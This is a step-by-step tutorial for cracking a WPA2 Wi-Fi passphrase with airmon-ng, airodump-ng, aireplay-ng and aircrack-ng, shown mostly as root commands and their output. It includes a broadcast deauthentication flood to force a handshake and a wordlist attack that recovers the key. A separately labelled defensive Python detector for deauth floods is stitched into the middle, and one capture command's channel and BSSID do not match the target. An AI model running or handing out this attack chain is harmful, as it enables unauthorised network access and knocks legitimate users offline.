Hacking WPA /WPA2 using Kali Linux
Disclaimer: Do not try this on networks you are not authorized to do so on.
— List the wireless network adapters
root@test1:~# airmon-ng
PHY Interface Driver Chipset
phy0 wlan0 rt2800usb D-Link Corp. DWA-125 Wireless N 150 Adapter(rev.A3) [Ralink RT5370]
root@test1:~#
— Put that adapter into monitor mode
root@test1:~# airmon-ng start wlan0
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
1072 NetworkManager
1185 avahi-daemon
1263 avahi-daemon
1328 dhclient
1970 wpa_supplicant
PHY Interface Driver Chipset
phy0 wlan0 rt2800usb D-Link Corp. DWA-125 Wireless N 150 Adapter(rev.A3) [Ralink RT5370]
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
root@test1:~#
— Kill the process IDs listed above that might interfere
root@test1:~# kill -9 1072
root@test1:~# kill -9 1185
root@test1:~# kill -9 1263
-bash: kill: (1263) - No such process
It is fine that this process is already gone: it was probably spawned by the first avahi-daemon, so killing the parent also killed the child.
root@test1:~# kill -9 1328
root@test1:~# kill -9 1970
root@test1:~#
— Run airodump-ng to list the visible wireless networks and their clients:
root@test1:~# airodump-ng wlan0mon
CH 12 ][ Elapsed: 54 s ][ 2016-12-19 07:33
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
64:86:74:78:68:A3 -44 13 1 0 11 54e. WPA2 CCMP PSK testnetwork
E4:83:59:22:9F:1E -82 14 17 0 11 54e. WPA2 CCMP PSK testnetwork
BSSID STATION PWR Rate Lost Frames Probe
64:86:74:78:68:A3 34:E6:AD:40:B2:0D -76 0 - 0e 0 1
E4:83:59:22:9F:1E 08:11:96:E2:28:02 -40 0e- 0e 0 13
E4:83:59:22:9F:1E 76:70:02:78:68:A3 -44 0e- 0e 0 6
root@test1:~#
Use Ctrl + Z to terminate it after some time.
— Dump traffic from the wireless network of your choosing, where -c is the channel number of the network you want to access, -w is the file prefix the captured traffic is written to, and --bssid is the MAC address (BSSID) of the access point:
root@test1:~# airodump-ng -c 13 -w dump.pcap --bssid 64:86:74:78:68:A3 wlan0mon
— At this point what we want is the wireless handshake. To get it we use the aireplay-ng tool with the BSSID of the access point we are accessing:
root@test1:~# aireplay-ng -0 0 -a E4:83:59:22:9F:1E wlan0mon
07:56:35 Waiting for beacon frame (BSSID: E4:83:59:22:9F:1E) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
07:56:36 Sending DeAuth to broadcast -- BSSID: [E4:83:59:22:9F:1E]
07:56:36 Sending DeAuth to broadcast -- BSSID: [E4:83:59:22:9F:1E]
07:56:37 Sending DeAuth to broadcast -- BSSID: [E4:83:59:22:9F:1E]
07:56:37 Sending DeAuth to broadcast -- BSSID: [E4:83:59:22:9F:1E]
07:56:38 Sending DeAuth to broadcast -- BSSID: [E4:83:59:22:9F:1E]
07:56:38 Sending DeAuth to broadcast -- BSSID: [E4:83:59:22:9F:1E]
07:56:39 Sending DeAuth to broadcast -- BSSID: [E4:83:59:22:9F:1E]
07:56:39 Sending DeAuth to broadcast -- BSSID: [E4:83:59:22:9F:1E]
07:56:40 Sending DeAuth to broadcast -- BSSID: [E4:83:59:22:9F:1E]
07:56:40 Sending DeAuth to broadcast -- BSSID: [E4:83:59:22:9F:1E]
07:56:40 Sending DeAuth to broadcast -- BSSID: [E4:83:59:22:9F:1E]
07:56:41 Sending DeAuth to broadcast -- BSSID: [E4:83:59:22:9F:1E]
07:56:41 Sending DeAuth to broadcast -- BSSID: [E4:83:59:22:9F:1E]
07:56:42 Sending DeAuth to broadcast -- BSSID: [E4:83:59:22:9F:1E]
07:56:42 Sending DeAuth to broadcast -- BSSID: [E4:83:59:22:9F:1E]
07:56:43 Sending DeAuth to broadcast -- BSSID: [E4:83:59:22:9F:1E]
07:56:43 Sending DeAuth to broadcast -- BSSID: [E4:83:59:22:9F:1E]
07:56:44 Sending DeAuth to broadcast -- BSSID: [E4:83:59:22:9F:1E]
07:56:44 Sending DeAuth to broadcast -- BSSID: [E4:83:59:22:9F:1E]
^C
root@test1:~#
— When the airodump-ng window shows "WPA handshake:" in its header line, you can stop the replay.
root@test1:~# airodump-ng -c 11 -w dump.pcap --bssid E4:83:59:22:9F:1E wlan0mon
CH 11 ][ Elapsed: 7 mins ][ 2016-12-19 07:56 ][ WPA handshake: E4:83:59:22:9F:1E
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
E4:83:59:22:9F:1E -80 100 4169 4877 48 11 54e. WPA2 CCMP PSK testnetwork
BSSID STATION PWR Rate Lost Frames Probe
E4:83:59:22:9F:1E 08:11:96:E2:28:02 -28 1e- 6e 0 2609
E4:83:59:22:9F:1E 76:70:02:78:68:A3 -40 0e- 0e 8 2148
E4:83:59:22:9F:1E F0:25:B7:72:21:35 -82 1e- 1 0 115
root@test1:~#
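The deauthentication flood above is easy to spot from the defender's side: a burst of unauthenticated deauth frames, to the broadcast address, carrying the AP's own BSSID as source. The following is an added example, not part of the original write-up, that runs a sliding-window detector over constructed frame records modelled on that aireplay-ng run (the frame layout, timestamps and the client address are assumptions made for the example):

```python
from collections import defaultdict, deque
from dataclasses import dataclass

BROADCAST = "FF:FF:FF:FF:FF:FF"


@dataclass
class Frame:
    ts: float      # seconds since capture start (constructed, not from a real pcap)
    subtype: str   # "deauth", "beacon", "data", ...
    src: str       # transmitter address (the BSSID when the frame claims to come from the AP)
    dst: str       # receiver address


def detect_deauth_flood(frames, window_s=5.0, threshold=8):
    """Alert once per source address that sends >= threshold deauthentication
    frames inside any window_s-second span. Returns (src, first_ts, count,
    to_broadcast) tuples; broadcast deauths are almost never legitimate."""
    recent = defaultdict(deque)   # src -> timestamps of its recent deauth frames
    alerts, alerted = [], set()
    for f in sorted(frames, key=lambda fr: fr.ts):
        if f.subtype != "deauth":
            continue
        q = recent[f.src]
        q.append(f.ts)
        while f.ts - q[0] > window_s:   # evict timestamps that fell out of the window
            q.popleft()
        if len(q) >= threshold and f.src not in alerted:
            alerted.add(f.src)
            alerts.append((f.src, q[0], len(q), f.dst == BROADCAST))
    return alerts


def sample_frames():
    """Constructed traffic: beacons every 100 ms from the AP, 19 deauths to
    broadcast at two per second spoofing the AP's BSSID (as aireplay-ng -0
    does), and one ordinary deauth from a client that is simply leaving."""
    ap = "E4:83:59:22:9F:1E"
    client = "08:11:96:E2:28:02"
    frames = [Frame(t / 10, "beacon", ap, BROADCAST) for t in range(120)]
    frames += [Frame(1.0 + 0.5 * i, "deauth", ap, BROADCAST) for i in range(19)]
    frames.append(Frame(6.0, "deauth", client, ap))
    return frames


if __name__ == "__main__":
    # With 802.11w (PMF) enabled, stations discard unprotected deauth frames,
    # so this burst would be logged but would no longer disconnect clients.
    for src, first, count, bcast in detect_deauth_flood(sample_frames()):
        print(f"deauth flood from {src} starting t={first}s ({count} frames, broadcast={bcast})")
```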
— Next we run aircrack-ng against the capture file containing the handshake. My file has -03 appended because it was the third file of the dump: as airodump-ng runs for a longer time it splits the capture into smaller files.
root@test1:~# aircrack-ng -w /usr/share/wordlists/rockyou.txt dump.pcap-03.cap
Opening dump.pcap-03.cap
Read 27727 packets.
# BSSID ESSID Encryption
1 E4:83:59:22:9F:1E testnetwork WPA (1 handshake)
Choosing first network as target.
Opening dump.pcap-03.cap
Reading packets, please wait...
Aircrack-ng 1.2 rc3
[00:00:02] 1044 keys tested (374.09 k/s)
Current passphrase: 321654987
Master Key : 71 AD C8 A3 CD FA 1A 2D 3D F3 BF 1F FE 9E E2 59
D8 D8 D2 78 AA A7 08 93 7E 65 3C B7 C4 6F 4A E2
Transient Key : 20 C8 B1 23 CD 57 83 50 2E 4F 13 25 9B DE 76 4F
4D EC F5 E7 47 C9 CB F8 4E 9F AD 5F B1 06 9F F1
9E 86 36 49 ED D7 D5 D1 B1 25 7A 30 3D FF 54 AD
D5 8C C5 03 3A B9 7E F9 9A 4A 60 B5 04 E2 11 8C
EAPOL HMAC : EF 31 CC E5 09 64 4A 8E F2 0E FB 70 3D 30 33 6B
^C
Quitting aircrack-ng...
root@test1:~#
— When the key is found, the output becomes:
root@test1:~#
root@test1:~# aircrack-ng -w /usr/share/wordlists/rockyou.txt dump.pcap-03.cap
Opening dump.pcap-03.cap
Read 27727 packets.
# BSSID ESSID Encryption
1 E4:83:59:22:9F:1E testnetwork WPA (1 handshake)
Choosing first network as target.
Opening dump.pcap-03.cap
Reading packets, please wait...
Aircrack-ng 1.2 rc3
[01:16:41] 1970412 keys tested (478.44 k/s)
KEY FOUND! [ zzwwwzzyyyy123 ]
Master Key : 3A 4D 8B 26 44 04 3A 2B B8 C7 B9 6F 76 81 4F 82
22 03 2A B3 8A 19 1E DF 02 F6 65 7F 62 A1 35 D8
Transient Key : 02 33 6E 00 39 0A 60 F8 FF 69 9D 23 FE B9 E5 29
C2 49 AC 3F 30 C1 E5 28 AE C6 BA 70 CF 82 81 80
57 13 6A B2 40 AC 20 D4 AE AC DE 15 05 88 0B 7F
30 3E 8B 7F CB A2 1A 3D 6E 3E D5 F2 86 1B EC 01
EAPOL HMAC : 0B E6 45 54 80 02 D7 06 DE 60 75 52 B0 D6 53 9A
root@test1:~#